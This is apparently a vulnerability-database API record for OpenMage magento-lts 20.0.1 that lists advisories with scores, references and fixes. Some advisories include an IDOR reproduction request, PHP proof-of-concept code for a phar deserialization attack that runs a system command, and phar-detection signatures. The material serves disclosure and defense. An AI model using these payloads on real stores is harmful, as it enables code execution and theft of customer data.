Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/263752?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/263752?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.1", "type": "composer", "namespace": "openmage", "name": "magento-lts", "version": "20.0.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "20.18.0", "latest_non_vulnerable_version": "21.0.0-beta1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49953?format=api", "vulnerability_id": "VCID-19kk-2s77-nuaa", "summary": "Magento's X-Original-Url header can expose admin url\nThe admin url can be discovered without prior knowledge of its location by exploiting the X-Original-Url header on some configurations.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25523", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0001", "scoring_system": "epss", "scoring_elements": "0.01176", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01403", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0141", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01409", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25523" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://hackerone.com/bugs?subject=openmage&report_id=3416312", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:34:33Z/" } ], "url": "https://hackerone.com/bugs?subject=openmage&report_id=3416312" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25523", "reference_id": "CVE-2026-25523", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25523" }, { "reference_url": "https://github.com/advisories/GHSA-jg68-vhv3-9r8f", "reference_id": "GHSA-jg68-vhv3-9r8f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jg68-vhv3-9r8f" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jg68-vhv3-9r8f", "reference_id": "GHSA-jg68-vhv3-9r8f", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:34:33Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jg68-vhv3-9r8f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73800?format=api", "purl": "pkg:composer/openmage/magento-lts@20.16.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": 
"http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.16.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/955536?format=api", "purl": "pkg:composer/openmage/magento-lts@21.0.0-beta1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@21.0.0-beta1" } ], "aliases": [ "CVE-2026-25523", "GHSA-jg68-vhv3-9r8f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-19kk-2s77-nuaa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44328?format=api", "vulnerability_id": "VCID-4tsg-n4v2-vyhg", "summary": "DoS vulnerability in MaliciousCode filter\n### Impact\nInfinite loop in malicious code filter in certain conditions.\n\n### Workarounds\n\nNone", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-23617", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.51012", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50967", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50997", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5095", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.51017", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-23617" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": 
"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/494027785bdb7db53e60c11ef03c144b61cd3172", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/494027785bdb7db53e60c11ef03c144b61cd3172" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23617", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23617" }, { "reference_url": "https://github.com/advisories/GHSA-3p73-mm7v-4f6m", "reference_id": "GHSA-3p73-mm7v-4f6m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3p73-mm7v-4f6m" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3p73-mm7v-4f6m", "reference_id": "GHSA-3p73-mm7v-4f6m", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3p73-mm7v-4f6m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], 
"resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2023-23617", "GHSA-3p73-mm7v-4f6m", "GMS-2023-153" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4tsg-n4v2-vyhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89603?format=api", "vulnerability_id": "VCID-66qk-mhwg-tqcz", "summary": "OpenMage LTS: Cross-user wishlist import leads to private option & file disclosure\n# Cross-user wishlist item import via shared wishlist code, leading to private option disclosure and file-disclosure variant\n\n## Summary\n\nThe shared wishlist add-to-cart endpoint authorizes access with a public `sharing_code`, but loads the acted-on wishlist item by a separate global `wishlist_item_id` and never verifies that the item belongs to the shared wishlist referenced by that code.\n\nThis lets an attacker use:\n\n- a valid shared wishlist code for wishlist A\n- a wishlist item ID belonging to victim wishlist B\n\nto import victim item B into the attacker's cart through the shared wishlist flow for wishlist A.\n\nBecause the victim item's stored `buyRequest` is reused during cart import, the victim's private custom-option data is copied into the attacker's quote. 
If the product uses a file custom option, this can be elevated to cross-user file disclosure because the imported file metadata is preserved and the download endpoint is not ownership-bound.\n\n## Vulnerability Type\n\n- Broken object-level authorization / IDOR\n- Cross-user data disclosure\n- Cross-user file disclosure variant\n\n## Root Cause\n\nIn `app/code/core/Mage/Wishlist/controllers/SharedController.php`, the shared flow does:\n\n```php\n$item = Mage::getModel('wishlist/item')->load($itemId);\n$wishlist = Mage::getModel('wishlist/wishlist')->loadByCode($code);\n...\n$item->addToCart($cart);\n```\n\nRelevant lines:\n\n- `SharedController.php:86` loads the wishlist item by global ID\n- `SharedController.php:87` loads the wishlist by shared code\n- `SharedController.php:99` imports the item into cart\n\nThere is no check that:\n\n```php\n$item->getWishlistId() == $wishlist->getId()\n```\n\nThe safe owner flow in `app/code/core/Mage/Wishlist/controllers/IndexController.php:521-528` does preserve this binding by deriving the wishlist from `item->getWishlistId()`.\n\nThe imported item keeps its original `buyRequest` because `app/code/core/Mage/Wishlist/Model/Item.php:370-372` passes that stored request directly into:\n\n```php\n$cart->addProduct($product, $buyRequest);\n```\n\n## Security Impact\n\n### Baseline impact\n\nAn attacker can import another user's private wishlist item into the attacker's own cart, using an unrelated shared wishlist code.\n\nThis is a clear cross-user authorization bypass. 
The victim item's private configuration is copied into the attacker's quote, including custom-option values such as personalized text.\n\n### Stronger variant: cross-user file disclosure\n\nIf the victim item contains a custom option of type `file`, the imported quote item preserves file metadata such as:\n\n- `quote_path`\n- `order_path`\n- `secret_key`\n\nThe file option renderer in `app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:547-552` generates a download URL from:\n\n- the imported `sales/quote_item_option` ID\n- the preserved `secret_key`\n\nThe downloader in `app/code/core/Mage/Sales/controllers/DownloadController.php:150-185`:\n\n- loads quote item option by global ID\n- verifies only product option type and `secret_key`\n- reads the file from `order_path` or `quote_path`\n\nIt does not verify ownership of the quote item, order, or original wishlist item. This creates a cross-user file disclosure path once victim file metadata has been imported.\n\n## Steps To Reproduce\n\n### Lab data\n\n- shared wishlist A:\n - `wishlist_id = 1`\n - `customer_id = 2`\n - `sharing_code = 6376bb8c37a09c2de3664bd8cdc16412`\n- victim wishlist B:\n - `wishlist_id = 2`\n - `customer_id = 3`\n- victim item:\n - `wishlist_item_id = 1`\n - `wishlist_id = 2`\n - `product_id = 2`\n- victim private text option marker:\n - `VICTIM-MARKER-49040822`\n\n### Reproduction\n\nSend:\n\n```http\nGET /wishlist/shared/cart/?code=6376bb8c37a09c2de3664bd8cdc16412&item=1\n```\n\nWhere:\n\n- `code` belongs to shared wishlist A\n- `item=1` belongs to victim wishlist B\n\n### Expected result\n\nThe request should be rejected because the item does not belong to the shared wishlist referenced by the `sharing_code`.\n\n### Actual result\n\nThe application imports victim item `1` into the attacker's quote anyway.\n\n## Verified Evidence\n\n### Baseline variant\n\nPreviously verified at quote/option level in lab:\n\n```text\noption_1 = VICTIM-MARKER-49040822\n```\n\nThis shows that the 
attacker's cart received victim-private custom-option data from another user's wishlist item.\n\n### File-disclosure variant\n\nPreviously verified in lab after importing a victim file-option payload:\n\n```text\n/sales/download/downloadCustomOption/id/9/key/86fca9b61c0b891b52fb/\n```\n\nThis URL was generated from imported quote item option data containing the victim file metadata and secret key.\n\n## Why This Is A Valid Bug\n\nThis is not a timing issue and does not depend on non-default security settings.\n\nThe bug is a direct authorization failure:\n\n- authorization is based on wishlist A's share code\n- the acted-on object is item B from another wishlist\n- there is no item-to-wishlist binding check\n- victim-controlled item state is then copied into attacker-controlled cart state\n\nThat is a broken object-level authorization issue with clear cross-user impact.\n\n## Remediation\n\nIn `SharedController::cartAction()`, reject any request where the loaded item does not belong to the wishlist loaded from the share code:\n\n```php\n$item = Mage::getModel('wishlist/item')->load($itemId);\n$wishlist = Mage::getModel('wishlist/wishlist')->loadByCode($code);\n\nif (!$item->getId() || !$wishlist->getId() || (int) $item->getWishlistId() !== (int) $wishlist->getId()) {\n return $this->_forward('noRoute');\n}\n```\n\nDefense in depth:\n\n- bind `sales/download/downloadCustomOption` to the current quote/order owner instead of trusting only `id + secret_key`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40098", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05649", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.0569", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05689", "published_at": "2026-06-06T12:55:00Z" }, { "value": 
"0.0002", "scoring_system": "epss", "scoring_elements": "0.05704", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40098" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/5446", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/5446" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-665x-ppc4-685w", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T18:10:34Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-665x-ppc4-685w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40098", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40098" }, { "reference_url": "https://github.com/advisories/GHSA-665x-ppc4-685w", "reference_id": "GHSA-665x-ppc4-685w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-665x-ppc4-685w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-40098", "GHSA-665x-ppc4-685w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": 
"http://public2.vulnerablecode.io/vulnerabilities/VCID-66qk-mhwg-tqcz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90111?format=api", "vulnerability_id": "VCID-7srh-wcuk-ryhg", "summary": "OpenMage LTS: Phar Deserialization leads to Remote Code Execution\nPHP functions such as `getimagesize()`, `file_exists()`, and `is_readable()` can trigger deserialization when processing `phar://` stream wrapper paths. OpenMage LTS uses these functions with potentially controllable file paths during image validation and media handling. An attacker who can upload a malicious phar file (disguised as an image) and trigger one of these functions with a `phar://` path can achieve arbitrary code execution.\n\n| Metric | Value | Justification |\n| ------------------------ | --------- | ------------------------------------------------ |\n| Attack Vector (AV) | Network | Exploitable via file upload and web requests |\n| Attack Complexity (AC) | High | Requires file upload + triggering phar:// access |\n| Privileges Required (PR) | None | Some upload vectors don't require authentication |\n| User Interaction (UI) | None | Exploitation is automatic once triggered |\n| Scope (S) | Unchanged | Impacts the vulnerable component |\n| Confidentiality (C) | High | Full system access via RCE |\n| Integrity (I) | High | Arbitrary code execution |\n| Availability (A) | High | Complete system compromise possible |\n\n## Affected Products\n\n- OpenMage LTS versions < 20.16.1\n- All versions derived from Magento 1.x with these code paths\n\n## Affected Files\n\n| File | Line | Vulnerable Function |\n| --------------------------------------------------------- | ---- | ---------------------------------------------- |\n| `app/code/core/Mage/Core/Model/File/Validator/Image.php` | 72 | `getimagesize($filePath)` |\n| `app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php` | 137 | `getimagesize($item->getFilename())` |\n| `lib/Varien/Image.php` | 71 | 
`$this->_getAdapter()->open($this->_fileName)` |\n\n## Vulnerability Details\n\nPHP's phar (PHP Archive) format stores metadata that is serialized. When PHP's stream wrapper functions access a file using the `phar://` protocol, the metadata is automatically deserialized. This occurs even with seemingly safe functions like `file_exists()` or `getimagesize()`.\n\nA polyglot file can be crafted that is both a valid image (passing initial validation) and a valid phar archive containing malicious serialized objects. When the application later processes this file using `phar://`, the deserialization triggers a gadget chain leading to RCE.\n\n### Attack Flow\n\n1. **Create polyglot file**: Attacker creates a file that is both valid JPEG and valid PHAR\n2. **Upload file**: Attacker uploads the polyglot via product images, CMS media, or import\n3. **Trigger phar:// access**: Attacker causes the application to access the file using `phar://` wrapper\n4. **Code execution**: PHAR metadata deserialization triggers gadget chain\n\n### Proof of Concept\n\n```php\n<?php\n// Create malicious phar file\nclass ExploitGadget {\n public $cmd = 'id > /tmp/pwned';\n function __destruct() {\n system($this->cmd);\n }\n}\n\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n$phar->addFromString('test.txt', 'test');\n$phar->setStub('<?php __HALT_COMPILER(); ?>');\n$phar->setMetadata(new ExploitGadget());\n$phar->stopBuffering();\n\n// Rename to appear as image\nrename('exploit.phar', 'exploit.jpg');\n\n// When getimagesize('phar://path/to/exploit.jpg') is called,\n// the ExploitGadget::__destruct() method executes\n```\n\n## Remediation\n\nBlock `phar://` paths before passing to vulnerable functions:\n\n```php\n// Before (vulnerable)\n[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);\n\n// After (fixed)\nif (str_starts_with($filePath, 'phar://')) {\n throw new Exception('Invalid image path.');\n}\n[$imageWidth, $imageHeight, $fileType] = 
getimagesize($filePath);\n```\n\nAdditionally, ICO files (which cannot be re-encoded by GD) are now scanned for phar signatures:\n\n- `__HALT_COMPILER();` - Required phar stub\n- `<?php` - PHP opening tag\n- `<?=` - PHP short echo tag\n\nAdditional hardening measures:\n\n1. **ICO uploads removed**: ICO file support is completely removed from new image uploads. This eliminates the polyglot attack vector entirely since all other image formats are re-encoded by GD, which strips any embedded phar metadata.\n\n2. **Phar wrapper disabled**: The `phar://` stream wrapper is unregistered at application bootstrap, preventing any phar deserialization attacks regardless of code path.\n\n3. **Cache deserialization hardening**: All `unserialize()` calls on cached data now use `allowed_classes => false` as defense-in-depth.\n\n**Note:** Existing uploaded ICO files will continue to work. Only new ICO uploads will be rejected. Users are encouraged to use PNG favicons for new uploads.\n\n## Workarounds\n\nIf immediate upgrade is not possible:\n\n1. **Disable phar stream wrapper** (if not needed):\n\n ```ini\n ; php.ini\n disable_functions = phar://\n ```\n\n Or in code (`disable_functions` is documented as a list of function names, so verify that the `php.ini` line above has any effect; unregistering the wrapper is the dependable control):\n\n ```php\n stream_wrapper_unregister('phar');\n ```\n\n2. **Strict upload validation**: Implement additional validation beyond file extension\n\n3. **File storage isolation**: Store uploads outside web root with randomized names\n\n4. 
**Web Application Firewall**: Block requests containing `phar://` in parameters\n\n\n## Credit\n\nThis vulnerability was discovered and responsibly disclosed by [blackhat2013](https://hackerone.com/blackhat2013) through HackerOne.\n\n## Timeline\n\n- **2025-12-31**: Vulnerability reported via HackerOne\n- **2026-01-21**: Fix developed and tested\n\nSource: https://hackerone.com/reports/3482926", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25524", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60352", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60325", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60342", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60354", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25524" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:41Z/" } ], "url": 
"https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fg79-cr9c-7369", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:41Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fg79-cr9c-7369" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25524", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25524" }, { "reference_url": "https://github.com/advisories/GHSA-fg79-cr9c-7369", "reference_id": "GHSA-fg79-cr9c-7369", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fg79-cr9c-7369" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-25524", "GHSA-fg79-cr9c-7369" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": 
